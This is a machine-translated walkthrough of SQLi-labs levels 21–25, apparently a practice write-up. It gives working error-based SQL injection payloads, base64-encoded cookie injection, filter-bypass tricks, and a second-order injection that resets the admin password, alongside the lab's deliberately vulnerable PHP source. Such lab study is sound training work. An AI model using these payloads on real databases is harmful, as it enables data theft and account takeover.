当前位置:网站首页>SQL lab 21~25 summary (subsequent continuous update) (including secondary injection explanation)
SQL lab 21~25 summary (subsequent continuous update) (including secondary injection explanation)
2022-07-07 12:24:00 【hcjtn】
Twenty one levels
Input admin It seems that there is no difference
Let's capture the twenty-one level :
Find it cookie There is a change , No, it's the last level admin, It's a bunch of random codes .
This is because :admin There was one base64 code
$cookee = base64_decode($cookee);
We can decode it once :
Discovery is admin.
The rest and 20 It's the same . Just turn the sentence into base64 The encryption
take :admin 'and updatexml(1,concat(0x7e,(select database()),0x7e),1) – q
Turn into :YWRtaW4gJ2FuZCB1cGRhdGV4bWwoMSxjb25jYXQoMHg3ZSwoc2VsZWN0IGRhdGFiYXNlKCkpLDB4N2UpLDEpIC0tIHEKCg==
Find out :
This is because – q It is easy to make mistakes when transforming , So we must convert a method of commenting out the following sentences : and ‘1’='1;
Let's analyze the source code :
$sql="SELECT * FROM users WHERE username=('$cookee') LIMIT 0,1"
Now let's inject this statement :
$sql="SELECT * FROM users WHERE username=(' 'and updatexml(1,concat(0x7e,(select database()),0x7e),1) and '1'='1') LIMIT 0,1"
Observation found that : sentence ‘$cookee’ The last single quotation mark in the middle and and ‘1’='1 combination So that it can be executed updatexml sentence .
therefore :
Query database name admin 'and updatexml(1,concat(0x7e,(select database()),0x7e),1) and ‘1’='1
The query table name :admin 'and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=‘security’ limit 0,1),0x7e),1) and ‘1’='1
Query the column name :admin 'and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema=‘security’ and table_name=‘emails’ limit 0,1),0x7e),1) and ‘1’='1
Query data :admin 'and updatexml(1,concat(0x7e,(select id from emails limit 0,1) , 0x7e),1) and ‘1’='1
Level 22
View the original code :
$cookee1 = '"'. $cookee. '"';
echo "<br></font>";
$sql="SELECT * FROM users WHERE username=$cookee1 LIMIT 0,1";
It is found that its package method is " "
Others and 21 It's the same :
Query database name admin "and updatexml(1,concat(0x7e,(select database()),0x7e),1) and “1”="1
The query table name :admin "and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=‘security’ limit 0,1),0x7e),1) and “1”="1
Query the column name :admin "and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema=‘security’ and table_name=‘emails’ limit 0,1),0x7e),1) and “1”="1
Query data :admin "and updatexml(1,concat(0x7e,(select id from emails limit 0,1) , 0x7e),1) and “1”="1
Twenty three levels
We are familiar with get The ginseng ,
Input ?id=1’ and 1=2 – q
Find out :
It does not recognize q So here The note does not take effect .
View source code , Find out :
$reg = "/#/";
$reg1 = "/--/";
$replace = "";
$id = preg_replace($reg, $replace, $id);
$id = preg_replace($reg1, $replace, $id);
preg_replace: Regular replacement functions , Can perform powerful callback functions , Add the regular modifier /e, Implement template engine compilation ( It's just string replacement ). In this source code, if # perhaps – , Will be replaced by empty .
Again because :
else
{
echo '<font color= "#FFFF00">';
print_r(mysql_error());
echo "</font>";
}
}
So use error injection :
eg :?id=1’and updatexml(1,concat(0x7e,(select database()),0x7e),1)or ‘1’='1
Twenty-four
We found that secondary injection is needed :
The secondary injection : The malicious data constructed by the attacker is stored behind the database , Malicious data is read and entered into sql Resulting injection .
The secondary injection is mainly divided into two steps :
Insert malicious data :
- When inserting data into the database for the first time , Only special characters are escaped , When writing to the database, the original data is retained , But the data itself contains malicious content .
Quoting malicious data :
- After storing the data in the database , Developers believe that the data is credible , The next time you need to query , Propose malicious data directly from the database , No further inspection and treatment , Will cause sql The second injection of
We register an account when we are doing 24 questions :admin’# Then log in
Let's first look at its source code :
<html>
<head>
</head>
<body bgcolor="#000000">
<?PHP
session_start();
if (!isset($_COOKIE["Auth"]))
{
if (!isset($_SESSION["username"]))
{
header('Location: index.php');
}
header('Location: index.php');
}
?>
<div align="right">
<a style="font-size:.8em;color:#FFFF00" href='index.php'><img src="../images/Home.png" height='45'; width='45'></br>HOME</a>
</div>
<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
if (isset($_POST['submit']))
{
# Validating the user input........
$username= $_SESSION["username"];
$curr_pass= mysql_real_escape_string($_POST['current_password']);
$pass= mysql_real_escape_string($_POST['password']);
$re_pass= mysql_real_escape_string($_POST['re_password']);
if($pass==$re_pass)
{
$sql = "UPDATE users SET PASSWORD='$pass' where username='$username' and password='$curr_pass' ";
$res = mysql_query($sql) or die('You tried to be smart, Try harder!!!! :( ');
$row = mysql_affected_rows();
echo '<font size="3" color="#FFFF00">';
echo '<center>';
if($row==1)
{
echo "Password successfully updated";
}
else
{
header('Location: failed.php');
//echo 'You tried to be smart, Try harder!!!! :( ';
}
}
else
{
echo '<font size="5" color="#FFFF00"><center>';
echo "Make sure New Password and Retype Password fields have same value";
header('refresh:2, url=index.php');
}
}
?>
<?php
if(isset($_POST['submit1']))
{
session_destroy();
setcookie('Auth', 1 , time()-3600);
header ('Location: index.php');
}
?>
</center>
</body>
</html>
if$username= $_SESSION["username"];
$curr_pass= mysql_real_escape_string($_POST['current_password']);
$pass= mysql_real_escape_string($_POST['password']);
$re_pass= mysql_real_escape_string($_POST['re_password']);
if($pass==$re_pass)
{
$sql = "UPDATE users SET PASSWORD='$pass' where username='$username' and password='$curr_pass' ";
We found a new function :
mysql_real_escape_string
mysql_real_escape_string() Function escape SQL Special characters in strings used in statements .
The following characters are affected :
- \x00
- \n
- \r
- \
- ’
- "
- \x1a
If it works , The function returns the escaped string . If you fail , Then return to false.
Tips : This function can be used to prevent database attacks (sql Inject )
So in the above source code Only username This function is not used , So only username It can be used sql Inject .
take admin’# Into it :
$sql = "UPDATE users SET PASSWORD='$pass' where username='admin'#' and password='$curr_pass' ";($pass==$re_pass)
We found that admin Medium ’ As in the previous username='admin Form closure # Comment out the following statements ;
That is, if we use admin’# The user who changed the password ( p a s s = = pass== pass==re_pass)
The following statement will be executed :
$sql = "UPDATE users SET PASSWORD='$pass' where username='admin'#' and password='$curr_pass' ";($pass==$re_pass)`
Implement changes admin Password .
Twenty five levels
Looking at the source code, we find :
function blacklist($id)
{
$id= preg_replace('/or/i',"", $id); //strip out OR (non case sensitive)
$id= preg_replace('/AND/i',"", $id); //Strip out AND (non case sensitive)
return $id;
}
If you use and perhaps or notes , Will be preg_replace Replace with “ ”,
/or/i
i Indicates case insensitive , Regardless of writing and still AND Will be replaced (or) Empathy
So we can use it mysql Logical operators in (&& and and || or)
?id=1’ && 1=1 – q
Be careful :& stay url Middle means multiple parameters
So when we use && Conduct url code (%26%26)
So in url Column input :?id=1’ %26%26 1=2-- q
Continue to observe the source code :
else
{
echo '<font color= "#FFFF00">';
print_r(mysql_error());
echo "</font>";
Therefore, joint query cannot be used , Error injection can be performed .
But we will enter it later ?id=1’ and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=‘security’ limit 0,1),0x7e),1) – q
Find out
In error reporting :
We found that :information Turned into infmation, Less or Replaced by function
So we can put information Written as infoorrmation, After function replacement, it becomes information
Then you can inject errors .
边栏推荐
- 百度数字人度晓晓在线回应网友喊话 应战上海高考英语作文
- Tutorial on principles and applications of database system (009) -- conceptual model and data model
- What are the technical differences in source code anti disclosure
- 跨域问题解决方案
- 数据库系统原理与应用教程(007)—— 数据库相关概念
- SwiftUI 教程之如何在 2 秒内实现自动滚动功能
- H3C HCl MPLS layer 2 dedicated line experiment
- Epp+dis learning road (2) -- blink! twinkle!
- What are the top-level domain names? How is it classified?
- wallys/Qualcomm IPQ8072A networking SBC supports dual 10GbE, WiFi 6
猜你喜欢
111. Network security penetration test - [privilege escalation 9] - [windows 2008 R2 kernel overflow privilege escalation]
[neural network] convolutional neural network CNN [including Matlab source code 1932]
数据库系统原理与应用教程(007)—— 数据库相关概念
小红书微服务框架及治理等云原生业务架构演进案例
Tutorial on principles and applications of database system (007) -- related concepts of database
Fleet tutorial 19 introduction to verticaldivider separator component Foundation (tutorial includes source code)
18 basic introduction to divider separator component of fleet tutorial (tutorial includes source code)
(to be deleted later) yyds, paid academic resources, please keep a low profile!
H3C HCl MPLS layer 2 dedicated line experiment
超标量处理器设计 姚永斌 第8章 指令发射 摘录
随机推荐
Mise en œuvre du codage Huffman et du décodage avec interface graphique par MATLAB
College entrance examination composition, high-frequency mention of science and Technology
ES底层原理之倒排索引
TypeScript 接口继承
Swiftui swift internal skill: five skills of using opaque type in swift
Tutorial on the principle and application of database system (008) -- exercises on database related concepts
EPP+DIS学习之路(2)——Blink!闪烁!
Improve application security through nonce field of play integrity API
108.网络安全渗透测试—[权限提升篇6]—[Windows内核溢出提权]
Flet教程之 14 ListTile 基础入门(教程含源码)
18 basic introduction to divider separator component of fleet tutorial (tutorial includes source code)
从工具升级为解决方案,有赞的新站位指向新价值
开发一个小程序商城需要多少钱?
[shortest circuit] acwing1128 Messenger: Floyd shortest circuit
UP Meta—Web3.0世界创新型元宇宙金融协议
Time bomb inside the software: 0-day log4shell is just the tip of the iceberg
Is it safe to open an account in Ping An Securities mobile bank?
MATLAB实现Huffman编码译码含GUI界面
平安证券手机行开户安全吗?
2022 年第八届“认证杯”中国高校风险管理与控制能力挑战赛